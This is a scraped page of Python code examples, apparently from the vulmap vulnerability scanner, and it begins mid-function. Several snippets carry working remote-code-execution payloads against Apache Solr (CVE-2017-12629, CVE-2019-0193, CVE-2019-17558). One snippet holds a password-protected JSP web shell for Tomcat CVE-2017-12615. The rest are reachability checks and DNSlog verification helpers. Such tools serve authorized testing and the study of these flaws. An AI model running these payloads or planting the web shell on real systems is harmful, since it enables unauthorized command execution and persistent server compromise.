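     if scheme in ("http", "https"):
         if self.hostname is None:
             raise ValueError("URL has no hostname: " + url)
         self.url = scheme + "://" + self.hostname + ":" + str(self.port)
     self.payload_cve_2017_12629 = '{"add-listener":{"event":"postCommit","name":"new_core","class":"solr.RunExecu' \
                                   'tableListener","exe":"sh","dir":"/bin/","args":["-c", "RECOMMAND"]}}'
     self.payload_cve_2019_0193 = "command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test" \
                                  "&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5B" \
                                  "CDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22RECOMMAND%22)%3B%0A++++++" \
                                  "++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++" \
                                  "++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%2" \
                                  "2XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3A" \
                                  "poc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport"
     self.payload_cve_2019_17558 = "/select?q=1&&wt=velocity&v.template=cus" \
                                   "tom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.for" \
                                   "Name(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27" \
                                   "java.lang.Character%27))+%23set($str=$x.class.forName(%27java.l" \
                                   "ang.String%27))+%23set($ex=$rt.getRuntime().exec(%27RECOMMAND%2" \
                                   "7))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach(" \
                                   "$i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read" \
                                   "()))%23end"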
Esempio n. 27
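 def __init__(self, url):
     """Store the target URL, its parsed host/port and the shared request settings.

     A missing port defaults to 443 for an https scheme and 80 for http; the
     scheme is read from the parsed URL rather than by substring match. The
     URL itself is stored unchanged.

     Args:
         url: Target URL.
     """
     self.url = url
     self.raw_data = None
     self.vul_info = {}
     self.ua = globals.get_value("UA")  # read global UA
     self.timeout = globals.get_value("TIMEOUT")  # read global TIMEOUT
     self.headers = globals.get_value("HEADERS")  # read global HEADERS
     self.ceye_domain = globals.get_value("ceye_domain")
     self.ceye_token = globals.get_value("ceye_token")
     self.ceye_api = globals.get_value("ceye_api")
     self.threadLock = threading.Lock()
     self.getipport = urlparse(self.url)
     self.hostname = self.getipport.hostname
     self.port = self.getipport.port
     scheme = self.getipport.scheme
     if self.port is None and scheme == "https":
         self.port = 443
     elif self.port is None and scheme == "http":
         self.port = 80
     # Do not use the payload:CVE-2017-12615 when checking
     # Use the payload:CVE-2017-12615 when exploiting
     # Because it is too harmful
     self.payload_cve_2017_12615 = '<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><' \
                                   '%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro =' \
                                   ' Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInpu' \
                                   'tStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\\n");}buf.cl' \
                                   'ose();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("password".equ' \
                                   'als(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCm' \
                                   'd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>'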
Esempio n. 28
 def __init__(self, url):
     """Store the target URL plus the shared request and ceye.io settings.

     Args:
         url: Target URL, stored unchanged.
     """
     self.url = url
     self.raw_data = None
     self.vul_info = {}
     # Request settings and ceye.io credentials all come from the globals module.
     settings = (
         ("ua", "UA"),
         ("timeout", "TIMEOUT"),
         ("delay", "DELAY"),
         ("headers", "HEADERS"),
         ("ceye_domain", "ceye_domain"),
         ("ceye_token", "ceye_token"),
         ("ceye_api", "ceye_api"),
     )
     for attr, key in settings:
         setattr(self, attr, globals.get_value(key))
Esempio n. 29
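def survival_check(url):
    """Return "s" if *url* looks reachable, "f" if not, and None when CHECK is not "on".

    A raw TCP connect to the parsed host/port (5 s timeout) is tried first;
    if that fails an HTTP GET with the shared request settings is tried.

    Args:
        url: Target URL.
    """
    if globals.get_value("CHECK") != "on":
        return None

    def _socket_conn(target):
        """TCP-connect to the host/port of *target*; "s" on success, "f" on any failure."""
        try:
            parsed = urlparse(target)
            hostname = parsed.hostname
            port = parsed.port
            # Only fill in a default when no port was given. The original's
            # trailing `else: port = 80` also overwrote an explicit port
            # (e.g. :8080) with 80 whenever it was present.
            if port is None:
                port = 443 if r"https://" in target else 80
            # The context manager closes the socket on every path, including
            # a failed connect, instead of leaking it.
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
                sock.settimeout(5)
                sock.connect((hostname, port))
            return "s"
        except Exception:
            # Best-effort probe: timeout, refused, DNS failure and an
            # unparseable target all mean "unreachable". Narrowed from a bare
            # except so KeyboardInterrupt still stops the scan.
            return "f"

    def _http_conn(target):
        """GET *target* with the shared settings; "s" if it completes, "f" on request errors."""
        try:
            timeout = globals.get_value("TIMEOUT")  # read global TIMEOUT
            headers = globals.get_value("HEADERS")
            requests.get(url_check(target),
                         timeout=timeout,
                         headers=headers,
                         verify=False)
            return "s"
        except (requests.exceptions.ConnectionError,
                requests.exceptions.Timeout,
                # add by https://github.com/zhzyker/vulmap/issues/30 @zilong3033 fix url extract
                requests.exceptions.InvalidURL):
            return "f"

    if _socket_conn(url) == "s" or _http_conn(url) == "s":
        return "s"
    return "f"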
Esempio n. 30
 def hyuga_co(md):
     """Return *md* if it appears in the hyuga.co DNS records, otherwise None.

     NOTE(review): ``timeout`` is not defined in this function and is assumed
     to be a module-level name — confirm.
     """
     headers_hyuga = {
         'User-Agent':
         'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
         'Connection': 'close',
         'Accept': '*/*',
         'Accept-Language':
         'zh,zh-TW;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6'
     }
     hyuga_token = globals.get_value("hyuga_token")
     hyuga_url = "http://api.hyuga.co/v1/records?type=dns&token=" + hyuga_token
     records = requests.get(hyuga_url, headers=headers_hyuga, timeout=timeout, verify=False)
     return md if md in records.text else None